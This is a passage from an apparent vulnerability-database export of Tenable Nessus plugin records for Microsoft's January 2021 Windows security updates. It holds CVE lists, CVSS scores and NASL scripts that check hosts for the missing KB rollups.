Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598279',\n '4598289'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598279, 4598289])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598231: Windows 10 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1681", "CVE-2021-1691", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598231.NASL", "href": "https://www.tenable.com/plugins/nessus/144873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144873);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598231\");\n script_xref(name:\"MSFT\", value:\"MS21-4598231\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598231: Windows 10 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598231/windows-10-update-kb4598231\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a8452c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598231'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598231])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:52", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. 